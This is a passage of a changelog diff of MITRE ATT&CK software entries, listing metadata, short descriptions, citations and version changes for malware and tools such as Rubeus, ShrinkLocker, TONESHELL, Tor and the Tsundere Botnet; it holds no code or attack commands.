+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0125",
+                            "external_id": "S0125"
+                        },
+                        {
+                            "source_name": "Kaspersky ProjectSauron Blog",
+                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.",
+                            "url": "https://securelist.com/faq-the-projectsauron-apt/75533/"
+                        },
+                        {
+                            "source_name": "ProjectSauron",
+                            "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog)"
+                        },
+                        {
+                            "source_name": "Symantec Strider Blog",
+                            "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.",
+                            "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Remsec",
+                        "Backdoor.Remsec",
+                        "ProjectSauron"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.735000+00:00\", \"old_value\": \"2025-06-06 14:56:00.296000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--e33267fe-099f-4af2-8730-63d49f8813b2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-29 20:19:26.940000+00:00",
+                    "modified": "2026-05-12 15:12:00.741000+00:00",
+                    "name": "Rubeus",
+                    "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1071",
+                            "external_id": "S1071"
+                        },
+                        {
+                            "source_name": "GitHub Rubeus March 2023",
+                            "description": "Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.",
+                            "url": "https://github.com/GhostPack/Rubeus"
+                        },
+                        {
+                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
+                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
+                        },
+                        {
+                            "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020",
+                            "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.",
+                            "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/"
+                        },
+                        {
+                            "source_name": "DFIR Ryuk's Return October 2020",
+                            "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.",
+                            "url": "https://thedfirreport.com/2020/10/08/ryuks-return/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Rubeus"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mayuresh Dani, Qualys",
+                        "Akshat Pradhan, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.741000+00:00\", \"old_value\": \"2026-04-19 16:35:49.683000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--50be4e81-db74-41a2-a9aa-423314082bea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-21 15:00:10.376000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "RustyWater",
+                    "description": "[RustyWater](https://attack.mitre.org/software/S9037) is\u202fa Rust-based implant used by [MuddyWater](https://attack.mitre.org/groups/G0069). Historically, [MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell-based tools and [RustyWater](https://attack.mitre.org/software/S9037) reflects a shift in tooling, demonstrating better techniques for defense evasion and reverse engineering.(Citation: CloudSEK_RustyWater_Jan2026)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9037",
+                            "external_id": "S9037"
+                        },
+                        {
+                            "source_name": "Archer RAT / RUSTRIC",
+                            "description": "(Citation: CloudSEK_RustyWater_Jan2026)"
+                        },
+                        {
+                            "source_name": "CloudSEK_RustyWater_Jan2026",
+                            "description": "Awasthi, P. (2026, January 8). Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant. Retrieved March 19, 2026.",
+                            "url": "https://www.cloudsek.com/blog/reborn-in-rust-muddywater-evolves-tooling-with-rustywater-implant"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "RustyWater",
+                        "Archer RAT / RUSTRIC"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-23 02:45:33.450000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--4e164a21-3fbe-4aaa-be69-2513fdba90f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 13:01:30.316000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "SameCoin",
+                    "description": "[SameCoin](https://attack.mitre.org/software/S9030) is a multi-platform wiper with Windows and Android versions that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East including in Israel.(Citation: Check Point Wirte NOV 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9030",
+                            "external_id": "S9030"
+                        },
+                        {
+                            "source_name": "Check Point Wirte NOV 2024",
+                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
+                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "SameCoin"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-22 00:47:27.191000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--3fc44c12-b16e-4de1-8869-cf0eb4446070",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-12-07 16:10:56.078000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "ShrinkLocker",
+                    "description": "[ShrinkLocker](https://attack.mitre.org/software/S1178) is a VBS-based malicious script that leverages the legitimate Bitlocker application to encrypt files on victim systems for ransom. [ShrinkLocker](https://attack.mitre.org/software/S1178) functions by using Bitlocker to encrypt files, then renames impacted drives to the adversary\u2019s contact email address to facilitate communication for the ransom payment.(Citation: Kaspersky ShrinkLocker 2024)(Citation: Splunk ShrinkLocker 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1178",
+                            "external_id": "S1178"
+                        },
+                        {
+                            "source_name": "Kaspersky ShrinkLocker 2024",
+                            "description": "Cristian Souza, Eduardo Ovalle, Ashley Mu\u00f1oz, & Christopher Zachor. (2024, May 23). ShrinkLocker: Turning BitLocker into ransomware. Retrieved December 7, 2024.",
+                            "url": "https://securelist.com/ransomware-abuses-bitlocker/112643/"
+                        },
+                        {
+                            "source_name": "Splunk ShrinkLocker 2024",
+                            "description": "Splunk Threat Research Team , Teoderick Contreras. (2024, September 5). ShrinkLocker Malware: Abusing BitLocker to Lock Your Data. Retrieved December 7, 2024.",
+                            "url": "https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "ShrinkLocker"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Cristian Souza - Kaspersky GERT"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-01-26 20:55:58.133000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--2683fde8-1dc4-415c-94bd-9bb95cc5b7ff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-15 13:52:23.890000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "TONESHELL",
+                    "description": "[TONESHELL](https://attack.mitre.org/software/S1239) is a custom backdoor that has been used since at least Q1 2021.(Citation: Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023)   [TONESHELL](https://attack.mitre.org/software/S1239) malware has previously been leveraged by Chinese affiliated actors identified as [Mustang Panda](https://attack.mitre.org/groups/G0129).(Citation: ATTACKIQ MUSTANG PANDA TONESHELL March 2023)(Citation: Zscaler)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1239",
+                            "external_id": "S1239"
+                        },
+                        {
+                            "source_name": "ATTACKIQ MUSTANG PANDA TONESHELL March 2023",
+                            "description": "Ken Towne, Francis Guibernau. (2023, March 23). Emulating the Politically Motivated Chinese APT Mustang Panda. Retrieved September 10, 2025.",
+                            "url": "https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023",
+                            "description": "Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/"
+                        },
+                        {
+                            "source_name": "Zscaler",
+                            "description": "Sudeep Singh. (2025, April 16). Latest Mustang Panda Arsenal: ToneShell and StarProxy | P1. Retrieved July 21, 2025.",
+                            "url": "https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "TONESHELL"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "YH Chang, ZScaler",
+                        "ZScaler"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-08 13:49:07.222000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.735000+00:00",
+                    "name": "TYPEFRAME",
+                    "description": "[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0263",
+                            "external_id": "S0263"
+                        },
+                        {
+                            "source_name": "TYPEFRAME",
+                            "description": "(Citation: US-CERT TYPEFRAME June 2018)"
+                        },
+                        {
+                            "source_name": "US-CERT TYPEFRAME June 2018",
+                            "description": "US-CERT. (2018, June 14). MAR-10135536-12 \u2013 North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.",
+                            "url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "TYPEFRAME"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.735000+00:00\", \"old_value\": \"2024-04-10 22:26:03.638000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:39.233000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Tasklist",
+                    "description": "The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0057",
+                            "external_id": "S0057"
+                        },
+                        {
+                            "source_name": "Microsoft Tasklist",
+                            "description": "Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Tasklist"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 14:20:48.948000+00:00\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-01-16 16:13:52.465000+00:00",
+                    "modified": "2026-05-12 15:12:00.741000+00:00",
+                    "name": "Tor",
+                    "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0183",
+                            "external_id": "S0183"
+                        },
+                        {
+                            "source_name": "Tor",
+                            "description": "(Citation: Dingledine Tor The Second-Generation Onion Router)"
+                        },
+                        {
+                            "source_name": "Dingledine Tor The Second-Generation Onion Router",
+                            "description": "Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.",
+                            "url": "http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Tor"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.741000+00:00\", \"old_value\": \"2026-04-22 21:19:41.095000+00:00\"}}}",
+                    "previous_version": "1.5"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--18f5f8c6-bba5-4aba-93e7-3539fe565883",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 22:24:44.870000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "Tsundere Botnet",
+                    "description": "[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or a PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\n\nA variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js.(Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) ",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9034",
+                            "external_id": "S9034"
+                        },
+                        {
+                            "source_name": "DinDoor",
+                            "description": "(Citation: Checkpoint_MOISCyberCrime_Mar2026)"
+                        },
+                        {
+                            "source_name": "Checkpoint_MOISCyberCrime_Mar2026",
+                            "description": "CheckPoint Research. (2026, March 10). Iranian MOIS Actors & the Cyber Crime Connection. Retrieved March 12, 2026.",
+                            "url": "https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/"
+                        },
+                        {
+                            "source_name": "CAL_MuddyWater_Mar2026",
+                            "description": "Ctrl-Alt-Intel. (2026, March 4). MuddyWater Exposed: Inside an Iranian APT operation . Retrieved April 6, 2026.",
+                            "url": "https://ctrlaltintel.com/research/MuddyWater/"
+                        },
+                        {
+                            "source_name": "SOCRadar_MuddyWaterDindoor_Mar2026",
+                            "description": "SOCRadar. (2026, March 9). MuddyWater Uses Dindoor Malware Targeting U.S. Networks. Retrieved March 12, 2026.",
+                            "url": "https://socradar.io/blog/iran-muddywater-dindoor-malware-us-networks/"
+                        },
+                        {
+                            "source_name": "SecureListUbiedo_Tsundere_Nov2025",
+                            "description": "Ubiedo, L. (2025, November 20). Blockchain and Node.js abused by Tsundere: an emerging botnet. Retrieved April 6, 2026.",
+                            "url": "https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Tsundere Botnet",
+                        "DinDoor"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-23 02:54:33.159000+00:00\"}, \"root['description']\": {\"new_value\": \"[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or a PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\\n\\nA variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js.(Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) \", \"old_value\": \"[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\\n\\nA variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js. (Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) \", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\\n+[Tsundere Botnet](https://attack.mitre.org/software/S9034) is a botnet first reported in mid-2025 that is delivered via MSI installer or a PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. [Tsundere Botnet](https://attack.mitre.org/software/S9034) is attributed to a likely Russian-speaking threat actor.\\n \\n-A variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js. (Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) \\n+A variant named DinDoor has been linked to [MuddyWater](https://attack.mitre.org/groups/G0069) operations and uses the Deno runtime for execution rather than Node.js.(Citation: Checkpoint_MOISCyberCrime_Mar2026)(Citation: SOCRadar_MuddyWaterDindoor_Mar2026)(Citation: CAL_MuddyWater_Mar2026)(Citation: SecureListUbiedo_Tsundere_Nov2025) \"}}}",
+                    "previous_version": "1.0",
+                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to2__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to2__0\"><a href=\"#difflib_chg_to2__top\">t</a></td><td class=\"diff_header\" id=\"from2_1\">1</td><td nowrap=\"nowrap\">[Tsundere&nbsp;Botnet](https://attack.mitre.org/software/S9034)&nbsp;i</td><td class=\"diff_next\"><a href=\"#difflib_chg_to2__top\">t</a></td><td class=\"diff_header\" id=\"to2_1\">1</td><td nowrap=\"nowrap\">[Tsundere&nbsp;Botnet](https://attack.mitre.org/software/S9034)&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;a&nbsp;botnet&nbsp;first&nbsp;reported&nbsp;in&nbsp;mid-2025&nbsp;that&nbsp;is&nbsp;delivered&nbsp;via&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;a&nbsp;botnet&nbsp;first&nbsp;reported&nbsp;in&nbsp;mid-2025&nbsp;that&nbsp;is&nbsp;delivered&nbsp;via&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">MSI&nbsp;installer&nbsp;or&nbsp;PowerShell&nbsp;script.&nbsp;It&nbsp;leverages&nbsp;Node.js&nbsp;and</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">MSI&nbsp;installer&nbsp;or<span class=\"diff_add\">&nbsp;a</span>&nbsp;PowerShell&nbsp;script.&nbsp;It&nbsp;leverages&nbsp;Node.js&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;JavaScript&nbsp;for&nbsp;payload&nbsp;delivery&nbsp;and&nbsp;execution,&nbsp;and&nbsp;uses&nbsp;sma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;JavaScript&nbsp;for&nbsp;payload&nbsp;delivery&nbsp;and&nbsp;execution,&nbsp;and&nbsp;uses&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rt&nbsp;contracts&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;to&nbsp;host&nbsp;command&nbsp;and&nbsp;control&nbsp;(</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mart&nbsp;contracts&nbsp;on&nbsp;the&nbsp;blockchain&nbsp;to&nbsp;host&nbsp;command&nbsp;and&nbsp;control</td></tr>\n            